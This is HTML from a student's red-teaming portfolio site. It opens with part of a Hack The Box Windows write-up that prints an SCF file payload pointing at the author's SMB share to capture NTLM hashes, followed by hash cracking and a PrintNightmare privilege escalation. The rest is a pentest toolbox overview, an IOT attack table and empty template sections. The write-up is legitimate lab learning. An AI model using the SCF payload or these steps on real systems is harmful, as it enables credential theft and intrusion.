          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
